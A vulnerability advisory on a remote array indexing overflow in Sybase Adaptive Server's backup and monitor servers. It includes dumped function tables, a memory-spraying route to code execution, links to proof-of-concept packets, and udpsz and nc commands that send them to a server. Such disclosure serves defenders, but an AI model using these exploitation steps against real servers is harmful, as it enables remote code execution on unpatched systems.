####################################################################### Luigi Auriemma Application: Sybase Adaptive Server http://www.sybase.com/products/databasemanagement/adaptiveserverenterprise Versions: <= 15.5 Platforms: Solaris, Windows, Linux, AIX, HP Bug: array indexing overflow in bcksrvr and monsrvr Exploitation: remote, versus server Date: probably found 28 Oct 2010 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== ??? ####################################################################### ====== 2) Bug ====== The backup and the monitor database servers listen by default on ports 5001 and 5002 and are important components of the Adaptive Server architecture. The problem is an array indexing overflow caused by the two 8bit values located at offsets 0x84 and 0x85 of the login packet and used to get the function pointer from the array. The following is the functions table for the value at offset 0x84: 0x100485b0 0x00000000 0x100485f0 0x00000000 0x100486f0 0x100486c0 0x00000000 0x10048770 0x10048620 0x00000000 0x00000000 0x00000000 0x100485b0 0x00000000 0x10048800 0x00000000 0x10048830 0x00000000 0x00000000 0x10048500 0x00000000 0x00000000 0x2f2e2d37 0x0f0e0d0c 0x26323d3c 0x1f1e1d1c 0x7d506c5b 0x614b606b 0xf7f6f5f4 0x6f6e7e4c 0xc7c6c5c4 0xd6d5d4d3 0xe6e5e4e3 0x6d5fbde0 0x87868584 0x96959493 0xa6a5a4a3 0x07a19b6a 0x87868584 0x8f8e8d8c 0x97969594 0x9f9e9d9c 0xa7a6a5a4 0xafaeadac 0xb7b6b5b4 0xbcbebdbc 0xc7c68fbf 0xcfcecdcc 0xd7d6d5d4 0xdfdedddc 0xe7e6e5e4 0xefeeedec 0xf7f6f5f4 0xff9ffdfc 0x7f200920 0x0f0e0d0c 0x20082020 0x1f1e1d1c 0x1b170a20 0x07060520 0x04202020 0x1a201514 0x20202020 0xb32b283c 0x20202020 0xaa3b292a 0x20202020 0x3f3e5f25 0x20202020 0x223d2740 0x67666564 0xc52020f3 0x706f6e6d 0xfef12020 0x78777675 0xf9f25bda 0x20202020 0xc4205dbf 0x47464544 0x20202020 0x504f4e4d 0x20202020 0x58575655 0x20202020 0x37363534 0x20202020 0x61657263 0x00007167 0x61657263 0x00007167 0x494a424f 0x00646971 0x61657263 0x00007167 0x61657263 0x00007167 0x6d747570 0x7067736d 0x5f767273 0x00716773 0x6d747570 0x5f767273 0x00716773 0x6d747570 0x5f767273 0x00716773 0x45544e49 0x534d203a 0x4556494c 0x5f767273 0x00716773 0x00000000 0x6d746567 0x5f767273 0x00716773 0x6d746567 0x5f767273 0x00716773 0x6d746567 0x5f767273 0x00716773 0x6d746567 0x5f767273 0x736d6574 0x5f767273 0x736d6574 0x5f767273 0x736d6574 0x5f767273 0x736d6574 0x5f767273 0x736d6574 0x5f767273 0x756d6574 0x5f767273 0x756d6574 0x5f565253 0x6d2a2044 0x7064695f 0x5f767273 0x756d6574 0x5f767273 0x756d6574 0x5f767273 0x6574756d 0x5f767273 0x6574756d 0x5f767273 0x6574756d 0x5f767273 0x6574756d 0x5f767273 0x756d6b63 0x5f767273 0x6574756d 0x5f767273 0x6574756d 0x5f767273 0x756d6574 0x5f767273 0x756d6574 0x5f767273 0x756d6574 0x5f767273 0x756d6574 0x5f767273 0x626f5f74 0x00000073 0x74207463 0x00000000 0x696e695f 0x7463656a 0x68736168 0x0000656c 0x696e695f 0x7463656a 0x5f767273 0x626f5f74 0x00000073 0x4e524554 0x45454c53 0x5f544345 0x5f767273 0x5f657461 0x5f767273 0x6a626f5f 0x5f767273 0x64696a62 0x5f767273 0x64696a62 0x5f6a626f 0x5f767273 0x64696a62 0x5f6a626f 0x00000000 0x6f746567 0x00000000 0x00000065 0x656d616e 0x5f767273 0x64696a62 0x5f767273 0x616e6a62 0x756c6176 0x5f6a626f 0x5f767273 0x616e6a62 0x5f6a626f 0x00000000 0x656b6177 0x00000000 0x61776375 0x00002928 0x696e695f 0x65766974 0x73646165 0x5f767273 0x616e5f74 0x7268745f 0x00000000 0x696e695f 0x65766974 0x73646165 0x5f767273 0x616e5f74 0x7268745f 0x00000000 0x696e695f 0x65766974 0x73646165 0x5f767273 0x6e657665 0x5f767273 0x5f707565 0x61657268 0x5f767273 0x665f7472 0x006e6f69 0x6174735f 0x74636e75 0x5f767273 0x665f7472 0x006e6f69 0x6174735f 0x74636e75 0x5f767273 0x616e696d 0x61657268 0x72726f53 0x645f7672 0x63746977 0x6e207369 0x6f707075 0x206e6f20 0x616c7020 0x000a2e6d While the following is the one for 0x85: 0x100485b0 0x00000000 0x100485f0 0x00000000 0x100486f0 0x10048690 0x00000000 0x10048720 0x10048620 0x00000000 0x00000000 0x00000000 0x100485b0 0x00000000 0x100487c0 0x00000000 0x10048830 0x00000000 0x00000000 0x10048500 0x00000000 0x10061a88 0x03020100 0x0b250516 0x13121110 0x273f1918 0x7b7f5a40 0x4e5c5d4d 0xf3f2f1f0 0x5e7af9f8 0xc3c2c17c 0xd2d1c9c8 0xe2d9d8d7 0xade9e8e7 0x83828179 0x92918988 0xa2999897 0x8ba9a8a7 0x83828180 0x8b8a8988 0x93929190 0x4a9a9998 0xa3a2a1a0 0xab5fa9a8 0x4fb2b1b0 0xbbbab9b8 0xc3c2c1ab 0xcbcac9c8 0xd3d2d1d0 0xdbacbbd8 0xe3e2e1e0 0xebeae9e8 0x8cae9ef0 0xfbfaafa1 0x03020100 0x0b202020 0x13121110 0x20201918 0x201c2020 0x20202020 0x20162020 0x20202020 0x20202020 0x2e9b2020 0x20202026 0x24212020 0x20202f2d 0x2c7c2020 0x20202020 0x233a6020 0x63626120 0x7b206968 0x6c6b6a20 0x7d207271 0x74737e20 0xc0207a79 0x20202020 0xd9202020 0x4342417b 0x20204948 0x4c4b4a7d 0x20205251 0x5453205c 0x20205a59 0x33323130 0x20203938 0x5f767273 0x736d6574 0x5f767273 0x736d6574 0x5f565253 0x6d2a2044 0x5f767273 0x736d6574 0x5f767273 0x736d6574 0x5f767273 0x00716773 0x00000000 0x6d747570 0x5f767273 0x00716773 0x6d747570 0x5f767273 0x00716773 0x6d747570 0x5f425953 0x4c414e52 0x45442047 0x00444552 0x6d746567 0x7067736d 0x5f767273 0x00716773 0x6d746567 0x5f767273 0x00716773 0x6d746567 0x5f767273 0x00716773 0x6d747570 0x5f767273 0x00716773 0x656c6564 0x00007167 0x656c6564 0x00007167 0x656c6564 0x00007167 0x656c6564 0x00007167 0x656c6564 0x00007167 0x61657263 0x00786574 0x61657263 0x00786574 0x494a424f 0x78657475 0x00000000 0x61657263 0x00786574 0x61657263 0x00786574 0x6b636f6c 0x00000078 0x6b636f6c 0x00000078 0x6b636f6c 0x00000078 0x6b636f6c 0x00000078 0x6f6c6e75 0x00786574 0x6b636f6c 0x00000078 0x6b636f6c 0x00000078 0x656c6564 0x00786574 0x656c6564 0x00786574 0x656c6564 0x00786574 0x656c6564 0x00786574 0x696e695f 0x7463656a 0x656a626f 0x656c6261 0x5f767273 0x626f5f74 0x00000073 0x62617420 0x5f767273 0x626f5f74 0x00000073 0x696e695f 0x7463656a 0x4e495f5f 0x5f5f4c41 0x4a424f50 0x0069255f 0x6572635f 0x006a626f 0x7465675f 0x00000000 0x6f746567 0x00000000 0x6f746567 0x00000000 0x00006469 0x6f746567 0x00000000 0x656d616e 0x5f767273 0x64696a62 0x756c6176 0x5f6a626f 0x006e656c 0x6f746567 0x00000000 0x6f746567 0x0000656d 0x00000065 0x00006469 0x6f746567 0x0000656d 0x656d616e 0x5f767273 0x29287075 0x5f767273 0x7075656b 0x5f767273 0x616e5f74 0x7268745f 0x00000000 0x696e695f 0x65766974 0x73646165 0x5f767273 0x616e5f74 0x7268745f 0x00000000 0x696e695f 0x65766974 0x73646165 0x5f767273 0x616e5f74 0x7268745f 0x00000000 0x5f71645f 0x00000074 0x6b61775f 0x745f7164 0x00000064 0x6174735f 0x74636e75 0x5f767273 0x665f7472 0x006e6f69 0x6174735f 0x74636e75 0x5f767273 0x665f7472 0x006e6f69 0x7265745f 0x745f6574 0x00000064 0x73202c79 0x735f6762 0x20292868 0x7320746f 0x64657472 0x73696874 0x726f6674 Code execution is accomplished by spraying the own data in the memory through the sending of various specific packets. The secret is sending the "filler" packets to the main server (port 5000) so that the shared memory in the 0x20202020 zone gets immediately filled and monsrvr will have full access to it. When the attacker sends the malformed packet with the array index set to 0x44 monsrvr will execute his code. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip http://aluigi.org/poc/sybase_2.zip udpsz -X 0x600 8 l 0 -f sybase_2_filler.dat -T -l 1 SERVER 5000 -1 and then: nc SERVER 5002 < sybase_2.dat ####################################################################### ====== 4) Fix ====== http://www.zerodayinitiative.com/advisories/ZDI-11-246/ #######################################################################